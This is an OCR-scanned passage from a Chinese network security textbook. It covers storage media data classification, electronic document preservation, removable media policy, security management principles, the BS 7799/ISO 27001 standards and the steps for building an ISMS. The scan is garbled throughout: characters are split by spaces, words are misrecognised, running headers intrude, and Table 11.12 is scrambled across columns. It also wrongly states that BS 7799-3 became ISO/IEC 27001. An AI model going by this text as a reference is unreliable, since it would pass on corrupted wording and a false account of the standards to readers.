对 所 有 的 存储 介质 之 上 存储 的 数据 进行 评价 和 分 类 ,数据 按照 其 重要 性 和 机 密 程 度 , 可 
分 为 以 下 4 类 。 

1) 关键 性 数据 

关键 性 数据 对 系统 的 功能 是 最 重要 的 、 不 可 替换 的 ,是 发 生 灾害 后 立即 需要 ,但 又 不 能 


再 复制 的 数据 。 关 键 性 数据 如 关键 性 程序 .加密 算法 和 密 钥 等 。 

关键 性 数据 应 该 复制 ,副本 所 在 的 存储 介质 应 该 分 散 存 放 在 安全 的 地 方 。 存 放 关 键 性 
数据 的 金属 文件 柜 等 保护 设备 应 具备 防火 、 防 高 温 、 防 水 .防震 和 防 电磁 场 的 性 能 。 

2) 重要 数据 

重要 数据 对 系统 的 功能 很 重要 ,可 以 在 不 影响 系统 最 主要 功能 的 情况 下 进行 复制 ,但 比 
较 困 难 和 昂贵 。 重 要 数据 如 重要 程序 ,存储 数据 、 输 入 和 输出 数据 等 。 

同 关键 性 数据 类 似 重 要 数据 也 应 该 复制 ,副本 所 在 的 存储 介质 应 该 分 散 存 放 在 安全 的 
地 方 。 存 放 重 要 数据 的 金属 文件 柜 等 保护 设备 应 具备 防火 、 防 高 温 \ 防 水 、 防 震 和 防 电磁 场 
的 性 能 。 

3) 有 用 数据 

有 用 数据 丢失 可 能 引起 极 大 的 不 便 , 但 可 以 很 快 复制 。 

有 用 数据 应 该 存放 在 密闭 的 金属 文件 箱 或 文件 柜 中 。 

4) 不 重要 数据 

不 重要 数据 在 系统 调试 和 维护 中 很 少 使 用 。 

存储 介质 上 的 各 类 数据 应 该 加 以 明显 的 分 类 标志 ,以 便于 管理 和 使 用 。 

3， 电子 文档 的 保存 与 维护 

电子 文档 在 保存 于 维护 方面 具有 不 同 于 纸 质 介质 的 特点 。 为 了 使 电子 文档 安全 可靠 
并 永久 处 于 可 准确 提供 使 用 的 状态 ,除了 满足 存储 介质 存放 的 环境 要 求 以 外 ,文档 管理 者 还 
需要 做 到 以 下 几 点 。 

1) 保证 电子 文档 载体 物理 上 的 准确 

由 于 电子 文档 来 自 各 个 方面 ,是 在 不 同 的 计算 机 系统 上 形成 的 ,而 且 在 格式 编排 上 也 有 
所 不 同 。 因 此 必须 对 电子 文档 所 依赖 的 技术 .数据 结构 和 相关 定义 参数 等 加 以 保存 ,或 采用 
其 他 方法 和 技术 加 以 转化 ,以 保证 电子 文档 内 容 逻 辑 上 的 准确 。 

2) 保证 电子 文档 的 原始 性 

对 于 一 些 比较 特殊 的 电子 文档 ,必须 以 原始 形成 的 格式 进行 还 原 显 示 。 为 了 保证 电子 
文档 的 原始 性 ,采用 的 方法 有 : 保存 电子 文档 相关 支持 软件 及 整个 应 用 系统 ; 保存 原始 文 
档 的 电子 图 像 ; 保存 电子 文档 的 打印 输出 件 或 制 成 微缩 品 。 

3) 保证 电子 文档 的 可 理解 性 

为 了 使 相关 人 员 能 够 完全 理解 一 份 电子 文档 ,需要 保存 于 文档 内 容 相 关 的 信息 。 这 些 
信息 包括 : 元 数据 ; 物理 结构 与 逻辑 结构 的 关系 ; 相关 电子 文档 的 名 称 、 存 储 位置 和 文档 之 
间 的 相互 关系 ; 与 电子 文档 内 容 相 关 的 背景 信息 等 。 

4) 对 电子 文档 载体 进行 有 效 的 检测 与 维护 

存储 电子 文档 的 存储 介质 ,特别 是 磁性 存储 介质 ,很 容易 受到 所 在 环境 的 影响 。 因 此 对 
保存 的 电子 文档 的 存储 介质 必须 定期 进行 检测 和 维护 ,以 保证 电子 文档 的 可 靠 性 。 检 测 时 
首先 需要 进行 外 观 检 查 ,确认 表面 是 否 有 物理 损坏 或 变形 ,是 否 清洁 ,是 否 有 霉 斑 出 现 等 。 
其 次 进行 逻辑 检测 ,采用 检测 软件 对 存储 介质 上 的 数据 进行 读 写 校 验 。 如 果 检 测 时 发 现 了 
错误 ,需要 进行 有 效 的 修正 或 更 新 。 

4. 存储 介质 的 管理 

(1) 存储 介质 应 造 册 登 记 , 编 制 目 录 , 集 中 分 类 管理 。 目 录 清 单 必须 具有 如 下 项 目 : 存 
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储 介质 类 别 .数据 类 别 、 文 件 所 有 者 、 卷 号 、 文 件 名 及 其 描述 、 项 目 编号 ,使 用 日 期 \ 保 留 期 限 。 

(2) 根据 应 用 需要 和 存储 环境 条 件 , 记 录 要 定期 循环 复制 ,副本 分 别 存放 。 

(3) 新 的 存储 介质 应 有 完整 的 归档 记录 。 

(4) 各 种 数据 应 定期 复制 到 存储 介质 上 ,并 送 存储 介质 库房 保管 。 

(5) 存储 介质 不 再 使 用 时 ,应 及 时 存 人 存储 介质 库房 内 。 

(6) 未 用 过 的 存储 介质 应 定期 检查 ,并 记录 检查 结果 。 报 废 的 媒体 在 销毁 之 前 ,应 进行 
消 磁 或 清除 数据 处 理 , 确 保 销毁 后 不 会 产生 信息 泄露 。 

(7) 未 经 审批 , 存 有 数据 的 存储 介质 不 得 随意 外 借 。 

5. 移动 存储 介质 管理 

USB 磁盘 ,移动 硬盘 等 移动 存储 介质 的 使 用 日 益 频 繁 ,车 管理 不 当 则 会 给 网 络 安 全 带 
来 严重 威胁 ,应 该 加 强 移 动 存储 介质 的 管理 。 只 有 在 非常 必要 时 , 才 使 用 移动 存储 介质 。 使 
用 时 需要 对 移动 存储 介质 进行 登记 和 监控 。 对 于 移动 存储 介质 的 管理 应 该 实施 以 下 策略 : 

(1) 移动 存储 介质 中 内 容 如 果 不 再 需要 ,应 该 使 其 不 可 重用 。 

(2) 对 移动 存储 介质 保持 审核 跟踪 。 

(3) 将 所 有 介质 存放 在 符合 制造 商 说 明 的 安全 和 保密 的 环境 中 。 

(4) 避免 由 于 移动 存储 介质 老化 而 导致 信息 丢失 ,及 时 将 信息 存储 在 其 他 地 方 。 

(5) 对 移动 存储 介质 进行 登记 ,对 移动 存储 戒指 的 使 用 进行 监控 。 

(6) 只 应 在 有 业务 要 求 时 , 才 使 用 移动 存储 介质 。 

6. 存储 介质 上 的 软件 保护 

对 于 存储 介质 的 软件 保护 ,可 以 采用 一 对 界限 寄存 器 ,将 存储 器 区 域 保护 属性 存放 在 这 
对 寄存 器 内 ,使 存储 器 某 区 域 的 访问 受到 限制 。 这 在 操作 系统 中 称 之 为 上 下 界 寄存 器 保 
护法 。 


11.2.2 虚拟 存储 器 保护 


虚拟 存储 器 是 操作 系统 中 的 策略 。 当 多 用 户 共享 资源 时 ,为 合理 分 配 内 存 、 外 存 空 间 ， 
设置 一 个 比 内 存 大 得 多 的 虚拟 存储 器 。 内 存 中 只 存放 执行 时 需要 的 程序 和 数据 ,其 余 程序 
和 数据 放 在 外 存 上 的 一 个 区 域 。 

虚拟 存储 保护 应 用 较 多 的 是 段 页 式 保护 。 逮 辑 地 址 空间 分 为 不 同 的 段 , 每 个 段 内 部 又 
分 为 若干 页 ,通过 对 段 表 和 页 表 的 保护 是 功能 更 强 的 一 种 保护 措施 。 


1l1.3 安全 管理 


据 有 关 部 门 统计 ,在 所 有 的 计算 机 安全 事件 中 ,属于 管理 方面 的 原因 比重 高 达 70% 以 
上 ,这 正 说 明 信 息 安 全 技术 与 信息 安全 管理 要 并 重 ,其 二 缺 一 不 可 。 因 此 ,解决 网 络 与 信息 
安全 问题 ,不仅 应 从 技术 方面 着 手 , 同 时 还 应 该 加 强 网 络 安全 的 管理 工作 。 


11.3.1 安全 管理 的 定义 


谈 到 管理 ,有 句 话 叫 “三 分 技术 ,七 分 管理 ”, 这 种 规律 同样 适用 于 网 络 安全 ,表明 了 管理 
因素 在 网 络 安全 中 所 占有 的 重要 地 位 。 


信息 安全 管理 是 通过 维护 信息 的 保密 性 ,完整 性 和 可 用 性 等 来 管理 和 保护 信息 资产 的 
一 项 体制 ,是 对 网 络 安全 进行 指导 、 规 范 和 管理 的 一 系列 活动 和 过 程 。 


11.3.2 安全 管理 的 原则 与 规范 


1. 安全 管理 的 原则 

1) 多 人 负责 原则 

在 人 员 人 允许 的 情况 下 ,由 最 高 领导 人 指定 两 个 或 两 个 以 上 的 可 信任 且 胜 任 的 工作 人 员 ， 
共同 参与 每 项 与 安全 有 关 的 活动 ,并 通过 签字 .记录 注册 等 方式 证 明 。 

与 安全 有 关 的 活动 主要 有 : 

(1) 访问 控制 使 用 证 件 的 发 放 与 回收 。 

(2) 系统 存储 介质 的 发 放 与 回收 。 

(3) 系统 的 初始 化 或 关闭 。 

(4) 保密 信息 的 处 理 。 

(5) 硬件 和 软件 的 日 常 维护 。 

(6) 重要 材料 的 接收 、 发 送 或 传输 。 

(7) 系统 的 重新 配置 。 

(8) 数据 库 、 应 用 程序 ,操作 系统 或 安全 软件 的 设计 、 实 现 和 修改 。 

(9) 重要 程序 或 数据 的 删除 .销毁 。 

(10) 重要 文档 ,系统 操作 过 程 或 时 间 处 置 计 划 的 更 改 。 

2) 任期 有 限 原 则 

任何 人 都 不 能 在 一 个 与 安全 有 关 的 岗位 上 工作 太 长 时 间 , 这 样 的 岗位 应 该 由 诚实 的 工 
作 人 员 轮 换 负责 。 工 作 人 员 应 不 定期 地 循环 任职 ,强制 实行 休假 制度 ,并 规定 对 工作 人 员 进 
行 轮流 培训 ,以 使 任期 有 限制 度 切实 可 行 。 

3) 责任 分 散 原则 

在 工作 人 员 素 质 和 数量 允许 的 情况 下 .不 由 一 人 集中 实施 全 部 与 安全 有 关 的 功能 ,应 由 
不 同 的 人 或 小 组 来 执行 。 分 别 需 要 由 不 同 的 人 或 小 组 来 执行 的 工作 主要 有 : 

(1) 计算 机 的 操作 与 计算 机 的 编程 。 

(2) 计算 机 的 操作 与 存储 介质 的 保护 。 

(3) 应 用 程序 的 编写 与 系统 程序 的 编写 。 

(4) 应 用 程序 的 编写 与 数据 库 的 管理 。 

(5) 数据 的 处 理 与 安全 的 控制 。 

(6) 数据 的 准备 与 数据 的 处 理 。 

责任 分 散 原则 的 实现 主要 采取 两 种 措施 : 建立 物理 屏障 和 制定 规则 。 

2. 安全 管理 的 规范 

计算 机 网 络 系统 的 安全 管理 部 门 应 根据 管理 原则 和 系统 处 理 数 据 的 保密 性 ,制定 相应 
的 管理 制度 或 采用 相应 的 规范 。 


网 络 实 体 滨 会 


基于 案例 的 网 络 安 会 技术 与 实践 


1) 制定 严格 的 操作 规程 

操作 规程 要 根据 多 人 负责 原则 和 责任 分 散 原则 ,各 负 其 责 ,不 能 超越 自己 的 职责 
范围 。 

2) 制定 完备 的 系统 维护 制度 

对 系统 进行 维护 时 ,应 该 采取 数据 保护 措施 。 维 护 时 应 该 首先 经 过 批准 ,并 有 安全 管理 
人 员 在 场 ,维护 的 内 容 要 进行 详细 记录 。 

3) 制定 应 急 措施 

为 了 实现 系统 在 紧急 情况 下 能 够 尽快 恢复 ,需要 制定 相应 的 应 急 措 施 ,将 可 能 的 损失 降 
到 最 低 。 


11.3.3 安全 管理 的 主要 内 容 


1. 信息 安全 管理 体系 

信息 安全 管理 体系 (Information Security Management System,ISMS) 是 组 织 在 整体 或 
特定 范围 内 建立 的 信息 安全 方针 和 目标 ,以 及 完成 这 些 目 标 所 用 的 方法 和 体系 。 它 是 直接 
管理 活动 的 结果 ,表示 为 方针 、 原 则 、 目 标 、 方 法 、 计 划 、 活 动 程序、 过程 和 资源 的 集合 。 

ISMS 的 范围 可 以 包括 整个 组 织 或 者 组 织 的 一 部 分 信息 系统 ,也 可 以 包括 特定 的 信息 
系统 。ISMS 的 作用 有 : 强化 员工 的 信息 安全 意识 ,规范 组 织 信息 安全 行为 ; 促使 组 织 的 管 
理 机 构 贯 彻 信息 安全 保障 体系 ; 对 关键 信息 资产 进行 全 面 系 统 的 保护 ,维持 竞争 优势 ; 确 
保 业 务 持续 开展 并 将 损失 降 到 最 低 程度 ; 使 组 织 的 生意 伙伴 和 客户 对 组 织 充满 信心 ; 如 果 
通过 体系 认证 ,可 以 提高 组 织 的 知名 度 与 信任 度 。 

在 信息 安全 管理 标准 方面 ,英国 标准 BS 7799 已 经 成 为 世界 上 应 用 最 广泛 与 典型 的 信 
息 安全 管理 标准 。 它 是 在 英国 标准 协会 (British Standards Institution, BSI) 指 导 下 制定 完 
成 的 。BS 7799 一 1《 信 息 安全 管理 实施 细则 于 1995 年 发 布 ; BS 7799 一 2 信息 安全 管理 体 
系 规范 》 于 1998 年 发 布 ; BS 7799 一 1《 信 息 安全 管理 实施 细则 ) 通 过 了 国际 标准 化 组 织 ISO 
的 认可 ,成 为 国际 标准 ISO/IEC 17799 一 1: 2000《 信 息 技术 一 一 信息 安全 管理 实施 细则 》， 
该 国际 标准 于 2000 年 12 月 发 布 ; BS 7799 一 3《 信 息 安全 管理 体系 ,信息 安全 风险 管理 指导 
方针 ) 作 为 ISO/IEC 27001 正式 于 2005 年 10 月 发 布 。 

ISO/IEC 27001: 2005 标准 强调 管理 体系 的 有 效 性 、 经 济 性 、 全 面 性 、 普 凯 性 和 开放 性 ， 
目的 是 为 希望 达到 一 定 管理 效果 的 组 织 提供 一 种 高 质量 ,高 实用 性 的 参照 ,是 建立 和 实施 
ISMS ,保障 组 织 ,政府 机 构 信息 安全 的 重要 手段 。 

2. 信息 安全 管理 的 内 容 

信息 安全 管理 应 该 涉及 信息 安全 的 各 个 方面 .包括 制定 信息 安全 策略 ` 风 险 评估 、 控 制 
目标 语 控制 方法 的 选择 .制定 规范 的 操作 流程 对 人 员 进 行 安全 意识 培训 等 一 系列 工作 。 

按照 ISO/IEC 17799: 2005 标准 ,一 般 在 以 下 11 个 领域 内 建立 管理 控制 措施 ,保证 
信息 资产 的 安全 与 业务 的 持续 性 。 标 准 BS 7799 的 安全 管理 控制 目标 与 控制 方法 见 
表 了 dns 

标准 BS 7799 的 详细 内 容 见 表 11. 12 。 


表 11.11 安全 管理 控制 目标 与 控制 方法 
1. 安全 方针 /策略 (Security Policy) 


2. 安全 组 织 (Security Organization) 


3. 资产 分 类 与 控制 (Asset Classification and Control) 


4. 人 员 安 全 
(Personnel 


Security) 


(Physical and 


5. 物理 与 环境 安全 


Environmental Security) 


6. 通信 与 运营 管理 


(Communications and 


8. 系统 开发 与 维护 


(Systems Development 


Operations Management) 


7. 访问 控制 (Access Control) 


and Maintenance) 


9. 信息 安全 事故 管理 (Information Security Incident Management) 


10. 业务 持续 性 管理 (Business Continuity Management) 


11. 法 律 法 规 符合 性 (Compliance) 


表 11.12 标准 BS 7799 的 详细 内 容 
标 准 目 的 内 容 
安全 方针 为 信息 安全 提供 管 ” 建 立 安全 方针 档案 
理 方向 和 支持 
安全 组 织 建立 组 织 内 的 管理 ”组 织 内 部 信息 安全 责任 ; 信息 采集 设施 安全 ; 可 被 第 三 方 利用 
体系 以 便 安全 管理 ”的 信息 资产 的 安全 ; 外 部 信息 安全 评审 ; 外 包 合 同 的 安全 
资产 分 类 与 ”维护 组 织 资产 的 适 ” 利 用 资产 清单 ,分 类 处 理 , 信 息 标签 等 对 信息 资产 进行 保护 
控制 当 保 护 系 统 
人 员 安 全 减少 人 为 造成 的 减少 错误 ,偷窃 ,欺骗 或 资源 误 用 等 人 为 风险 ; 保密 协议 ; 安全 
风险 教育 培训 ; 安全 事故 与 教训 总 结 ; 惩罚 措施 
物理 与 环境 防止 对 IT 服务 的 未 阻止 对 工作 区 与 物理 设备 的 非法 进入 ; 业务 机 密 和 信息 非法 的 
安全 经 许可 的 介入 ,损伤 ”访问 ,损坏 \ 干 扰 ; 阻止 资产 的 丢失 ,损坏 或 遭受 危险 ; 桌面 与 屏 
和 干扰 服务 幕 管理 阻止 信息 的 泄漏 
通信 与 操作 保证 通信 和 操作 设 确保 信息 处 理 设备 的 正确 和 安全 的 操作 ; 降低 系统 失效 的 风 
管理 备 的 正确 和 安全 险 ; 保护 软件 和 信息 的 完整 性 ; 维护 信息 处 理 和 通信 的 完整 性 
维护 和 可 用 性 ; 确保 网 络 信息 的 安全 措施 和 支持 基础 结构 的 保护 ; 
防止 资产 被 损坏 和 业务 活动 被 干扰 中 断 ; 防止 组 织 间 的 交易 信 
息 遭 受 损坏 、 修 改 或 误 用 
访问 控制 控制 对 商业 信息 的 ”控制 访问 信息 ; 阻止 非法 访问 信息 系统 ; 确保 网 络 服务 得 到 保 
访问 护 ; 阻止 非法 访问 计算 机 ; 检测 非法 行为 ; 保证 在 使 用 移动 计 
算 机 和 远程 网 络 设备 时 信息 的 安全 
系统 开发 与 ”保证 系统 开发 与 维 ”确保 信息 学 安全 保护 深入 到 操作 系统 中 ; 阻止 应 用 系统 中 的 用 
维护 护 的 安全 户 数据 丢失 ,修改 或 误 用 ; 确保 信息 的 保密 性 ,可 靠 性 和 完整 
性 ; 确保 IT 项 目 工程 及 其 支持 活动 在 安全 的 方式 下 进行 ; 维护 
应 用 程序 软件 和 数据 的 安全 
信息 安全 事 ”保证 信息 安全 事故 ”确保 与 信息 系统 有 关 的 信息 安全 事故 和 弱点 能 够 以 某 种 方式 传 
故 管理 的 及 时 报告 和 处 理 达 , 以 便 及 时 采取 纠正 措施 ; 确保 采用 一 臻 和 有 效 的 方法 对 信 
息 安全 事故 进行 管理 
业务 持续 防止 商业 活动 中 断 防止 商业 活动 的 中 断 ; 防止 关键 商业 过 程 免 受 重大 失误 或 灾难 
管理 和 灾难 事故 的 影响 。 ”的 影响 
符合 避免 任何 违反 法 令 、 避免 违背 刑法 、 民 法 条例, 遵守 契约 责任 以 及 各 种 安全 要 求 ; 
法 规 、 合 同 预订 及 其 ”确保 组 织 系统 符合 安全 方针 和 标准 ; 使 系统 审查 过 程 的 绩效 最 
他 安全 要 求 的 行为 大 化 ,并 将 干扰 因素 降 到 最 小 


网 络 实 体 朗 会 


秦 于 案例 的 网 络 安全 技术 与 实践 


3. 信息 安全 管理 体系 的 建立 

总 体 来 说 ,建立 ISMS 一 般 要 经 过 下 列 6 个 基本 步骤 。 

1) 进行 ISMS 的 策划 与 准备 

(1) 管理 承诺 。 

组 织 管理 层 应 该 提供 承诺 建立 .实施 .运行 ,监控 .评审 、 维 护 和 改进 ISMS 的 证 据 。 

(2) 组 织 与 人 员 建 设 。 

建立 有 效 的 信息 安全 机 构 , 对 组 织 中 的 各 类 人 员 分 配角 色 、 明 确 权 限 、 落 实 责任 并 进行 
沟通 。 

(3) 编制 工作 计划 。 

组 织 进行 统筹 安排 ,制定 一 个 切实 可 行 的 工作 计划 ,明确 各 个 时 间 段 的 工作 目标 工作 
任务 和 责任 分 工 , 控 制 工作 进度 ,突出 工作 重点 ,安排 和 制定 总 体 计划 。 总 计 计 划 被 批准 后 ， 
可 以 针对 具体 工作 项 目 制定 详细 计划 。 

(4) 能 力 要 求 与 教育 培训 。 

培训 工作 要 分 层次 、 分 阶段 .循序 渐进 地 进行 ,必须 是 全 员 培 训 。 

2) 建立 信息 安全 管理 框架 

首先 ,各 组 织 应 根据 自身 的 状况 搭建 适合 自身 业务 发 展 和 信息 安全 需求 的 信息 安全 管 
理 框架 ,并 在 正常 的 业务 开展 过 程 中 具体 实施 构建 的 ISMS。 同 时 在 ISMS 的 基础 上 ,建立 
各 种 与 信息 安全 管理 框架 相 一 致 的 相关 文档 、 文 件 , 并 对 其 进行 严格 的 管理 。 对 在 具体 实施 
ISMS 的 过 程 中 出 现 的 各 种 信息 安全 事件 和 安全 状况 进行 严格 的 记录 ,并 建立 严格 的 反馈 
流程 和 制度 。 

建立 信息 安全 管理 框架 的 步骤 见 图 11. 1。 
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图 11.1 建立 信息 安全 管理 框架 的 步骤 


(1) 定义 信息 安全 政策 。 

信息 安全 政策 (Information Security Policy) 是 一 个 组 织 有 关 信 息 安全 的 总 的 指导 方 
针 , 是 向 组 织 管理 层 和 全 体 员 工 提 供 信 息 安 全 的 基础 。 在 定义 信息 安全 政策 时 ,要 密切 联系 
组 织 的 实际 ,注意 使 组 织 的 信息 安全 政策 与 自身 的 性 质 相 一 致 。 同 时 ,信息 安全 政策 应 该 简 
单 扼要 、 通 俗 易 懂 。 


(2) 定义 ISMS 的 范围 。 
一 个 单位 现 有 的 组 织 结构 是 其 定义 ISMS 范围 需要 考虑 的 最 重要 的 方面 。 组 织 可 能 会 
根据 自己 的 实际 情况 ,只 在 相关 的 部 门 或 领域 构建 ISMS 并 最 终 申请 ISMS 认证 。 所 以 ,在 
信息 安全 范围 定义 阶段 ,应 将 企 事业 单位 划分 成 不 同 的 信息 安全 控制 领域 ,以 易于 组 织 对 信 
息 安 全 有 不 同 需求 的 领域 进行 适当 的 信息 安全 管理 。 
(3) 进行 信息 安全 风险 评估 。 
信息 安全 风险 评估 的 复杂 程度 将 取决 于 风险 的 复杂 程度 和 受 保护 资产 的 敏感 程度 ,所 
采用 的 评估 措施 应 与 组 织 对 信息 资产 风险 的 保护 需求 相 一 致 。 
具体 有 3 种 风险 评估 方法 可 供 选 择 : 
。 基本 风险 评估 。 仅 参照 标准 所 列举 的 风险 对 组 织 资产 进行 风险 评估 。 
。 详细 风险 评估 。 即 先 对 组 织 的 信息 资产 进行 详细 划分 并 赋值 ,再 具体 针对 不 同 的 信 
息 资产 所 面 对 的 不 同 风险 ,详细 划分 对 这 些 资产 造成 威胁 的 等 级 和 相关 的 脆弱 性 
等 级 。 

。 基本 风险 评估 与 详细 风险 评估 相 结 合 。 利 用 基本 风险 评估 方法 鉴别 出 在 信息 安全 
管理 系统 范围 内 ,存在 的 高 风险 或 对 组 织 商 业 运 作 至 关 重 要 的 资产 ,这 类 资产 需要 
特殊 对 待 。 对 需 特殊 对 待 的 信息 资产 使 用 详细 风险 评估 方法 ,而 对 其 他 一 般 对 待 的 
信息 资产 使 用 基本 风险 评估 方法 。 

(4) 进行 信息 安全 风险 评估 管理 。 

由 于 组 织 内 外 环境 的 影响 ,信息 安全 风险 处 处 存在 , 且 不 停 地 变动 。 所 以 识别 了 信息 资 
产 面 对 的 威胁 和 进行 风险 评估 之 后 , 企 事业 单位 必须 决定 如 何 对 风险 进行 管理 。 

。 降低 风险 。 几 乎 所 有 的 风险 都 可 以 被 降低 。 

。 避免 风险 。 有 些 风险 是 很 容易 避免 的 。 

。 转嫁 风险 。 一 般 用 于 那些 低 概 率 的 、 但 一 旦 发 生 会 对 组 织 单位 有 重大 影响 的 风险 。 

通常 只 有 风险 不 能 被 降低 或 避免 且 被 转嫁 方 接受 时 才 被 采用 。 

。 接受 风险 。 用 于 那些 在 采取 了 降低 风险 和 避免 风险 措施 之 后 ,必然 存在 并 必须 接受 

的 风险 。 

(5) 确定 控制 目标 和 选择 控制 措施 。 

控制 目标 的 确定 和 控制 措施 的 选择 原则 是 成 本 不 超过 风险 所 造成 的 损失 。 由 于 信息 安 
全 是 一 个 动态 的 系统 工程 ,因此 组 织 应 实时 对 选择 的 控制 目标 和 控制 措施 加 以 校 验 和 调整 ， 
以 适应 不 断 变化 的 情况 ,使 组 织 的 信息 资产 得 到 有 效 ,经 济 、 合 理 的 保护 。 

(6) 准备 信息 安全 适用 性 声明 。 

信息 安全 适用 性 声明 记录 了 组 织 内 相关 的 风险 管制 目标 和 针对 每 种 风险 所 采取 的 各 种 
控制 措施 。 一 方面 是 为 了 向 组 织 内 的 员工 申明 对 信息 安全 面 对 的 风险 的 态度 ; 另 一 方面 是 
为 了 向 外 界 表明 组 织 的 态度 和 作为 。 

3) 建立 相关 的 文档 ,文件 

在 ISMS 建设 .实施 的 过 程 中 ,必须 建立 起 各 种 相关 的 文档 、 文 件 。 文 档 可 以 各 种 形式 
保存 ,但 必须 划分 不 同 的 等 级 或 类 型 ,而 且 文 档 必须 能 容易 地 被 指定 的 第 三 方 访问 和 理解 。 
建立 起 各 种 文档 后 ,组 织 还 必须 对 它 进行 严格 管理 ,并 结合 组 织 业 务 和 规模 的 变化 ,对 文档 
进行 有 规律 .周期 性 的 修正 。 
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ISMS 文件 主要 包括 : 

(1) 信息 安全 方针 与 策略 。 

(2) ISMS 范围 。 

(3) 风险 评估 报告 。 

(4) 风险 控制 计划 。 

(5) ISMS 的 控制 目标 与 控制 措施 。 

(6) ISMS 管理 和 具体 操作 的 过 程 。 

(7) 标准 中 要 求 的 记录 。 

(8) 信息 安全 相关 职责 描述 和 相关 的 活动 事项 。 

(9) 适用 性 声明 。 

4) 具体 实施 ISMS 

在 具体 实施 ISMS 的 过 程 中 ,必须 充分 考虑 方方面面 的 因素 ,如 实施 的 各 项 费用 因素 、 
与 组 织 员工 原 有 工作 习惯 的 冲突 不 同 部 门 及 机 构 之 间 在 实施 过 程 中 的 相互 协作 问题 等 。 

必须 对 实施 ISMS 的 过 程 中 发 生 的 各 种 与 信息 安全 有 关 的 事件 进行 全 面 记 录 。 它 为 组 
织 进行 信息 安全 政策 定义 ,安全 管制 措施 选择 等 的 修正 提供 了 现实 的 依据 。 安 全 事件 记录 
必须 清晰 ,并 适当 保存 以 及 维护 ,使 得 当 记录 被 破坏 、 损 坏 或 丢失 时 容易 挽救 。 

5) 对 ISMS 进行 审核 

ISMS 审核 是 指 组 织 为 验证 所 有 安全 方针 、 策 略 和 程序 的 正确 实施 ,检查 信息 系统 符合 
安全 实施 标准 的 情况 所 进行 的 系统 的 、 独 立 的 检查 和 评价 ,是 ISMS 的 一 种 自我 保证 手段 。 
审核 结果 则 是 一 系列 不 符合 行为 或 者 观察 结果 ,以 及 相应 的 校正 行为 的 报告 。ISMS 审核 
包括 管理 与 技术 两 方面 的 审核 。 管 理性 审核 主要 是 定期 检查 有 关 安 全 方针 与 程序 是 否 被 正 
确 有 效 地 实施 ; 技术 性 审核 是 指定 期 检查 组 织 的 信息 系统 符合 安全 实施 标准 的 情况 。 技 术 
性 审核 需要 信息 安全 技术 人 员 的 支持 ,必要 时 可 以 使 用 系统 审核 工具 。 

6) 对 ISMS 进行 管理 评审 

管理 评审 主要 是 指 组 织 的 最 高 管理 者 按照 规定 的 时 间 间 隔 对 ISMS 进行 评审 ,以 确保 
体系 的 持续 适应 性 、 充 分 性 和 有 效 性 。 管 理 评审 过 程 应 该 确保 收集 必要 的 信息 ,用 于 管理 者 
进行 评价 ,结果 应 该 形成 文件 。 根 据 ISMS 审核 的 结果 、 环 境 的 变化 和 对 持续 改进 的 承诺 ， 
指出 可 能 需要 改进 的 ISMS 方针 策略、 目标 和 其 他 要 素 。 


11.3.4 健全 管理 机 构 和 规章 制度 


一 般 来 说 ,有 单位 主要 领导 负责 网 络 系统 安全 ,设置 专门 机 构 ,具体 工作 由 各 个 部 门 分 
工 负 责 , 所 有 领导 机 构 ,安全 组 织 机 构 都 要 建立 各 种 规章 制度 。 

1. 健全 管理 机 构 

保障 网 络 安全 必须 依赖 组 织 行为 , 单 靠 某 一 个 人 或 几 个 人 是 无 法 完成 的 。 因 此 ,必须 建 
立 组 织 机 构 ,建立 有 效 的 工作 机 制 ,配备 必要 的 管理 人 员 和 技术 人 员 , 明 确 职责 。 管 理 机 构 
一 般 分 为 3 个 层次 ,每 个 层次 都 有 明确 的 职责 。 

1) 决策 机 构 : 负责 宏观 管理 

决策 机 构 应 当 由 组 织 的 最 高 管理 层 与 网 络 安全 有 关 的 部 门 负责 人 和 管理 技术 人 员 组 
成 ,职责 是 为 安全 管理 提供 导向 和 支持 。 决 策 机 构 的 任务 主要 包括 : 


(1) 评审 和 审批 安全 方针 。 

(2) 分 配 信息 安全 管理 职责 。 

(3) 确认 风险 评估 的 结构 。 

(4) 对 与 安全 管理 有 关 的 重大 更 改 事项 进行 决策 。 

(5) 检测 和 评审 安全 事故 。 

(6) 审批 与 安全 管理 有 关 的 其 他 重要 事项 。 

2) 管理 机 构 : 负责 日 常 协调 、 管 理 

管理 机 制 通过 对 人 力 资源 的 管理 ,完成 对 事件 、 任 务 和 事务 的 管理 。 管 理 机 构 的 任务 主 
要 包括 : 

(1) 对 安全 事件 进行 评估 ,确定 应 采取 的 安全 响应 级 别 。 

(2) 确定 安全 事件 的 响应 策略 ,技术 手段 。 

(3) 管理 安全 相关 的 日 常 工作 。 

(4) 管理 安全 相关 的 人 力 资 源 。 

(5) 管理 安全 组 织 内 部 和 外 部 的 相关 信息 。 

(6) 管理 安全 组 织 的 资产 。 

3) 执行 机 构 

由 各 类 安全 管理 人 员 和 技术 人 员 组 成 ,负责 落实 规章 制度 、 技 术 规范 。 根 据 时 间 的 具体 
情况 和 决策 机 构 的 决策 ,处 理 网 络 中 出 现 的 技术 方面 的 问题 。 执 行 机 构 主 要 由 以 下 人 员 
组 成 : 

(1) 安全 技术 人 员 。 

(2) 系统 集成 技术 人 员 。 

(3) 计算 机 网 络 与 通信 技术 人 员 。 

(4) 安全 法 律 专家 。 

(5) 软 硬 件 技术 人 员 。 

2. 完善 规章 制度 

要 确保 各 类 人 员 按 照 规 定 职责 形式 .就 要 实施 一 系列 的 安全 管理 规章 制度 。 

常见 的 安全 管理 规章 制度 主要 包括 如 下 内 容 。 

1) 操作 人 员 及 管理 人 员 的 管理 制度 

人 是 计算 机 执行 安全 机 制 的 主体 ,对 人 员 的 控制 和 管理 师 安 全 防护 的 重要 环节 。 许 多 
安全 事件 都 是 由 内 部 人 员 引 起 的 ,因此 ,人 员 的 素质 十 分 重要 。 除 了 加 强 法 制 建设 形成 威慑 
外 ,还 应 该 采取 科学 的 管理 措施 ,减少 犯罪 。 

(1) 安全 授权 。 

安全 授权 指 不 同 的 管理 人 员 在 岗位 上 课程 处 理 的 最 高 密级 信息 。 安 全 授权 包括 专 控 信 
息 授 权 、 机 密 信息 的 授权 、 秘 密 信息 的 授权 和 受 控 信息 的 授权 。 

(2) 安全 审查 。 

安全 审查 是 指 对 某 人 参与 安全 保障 和 接触 敏感 信息 是 否 合适 ,是 否 值得 信任 的 一 种 审 
查 。 对 于 预备 录用 的 人 员 、 新 录用 的 人 员 和 正在 使 用 的 人 员 都 应 做 好 人 事 安全 审查 ,并 对 其 
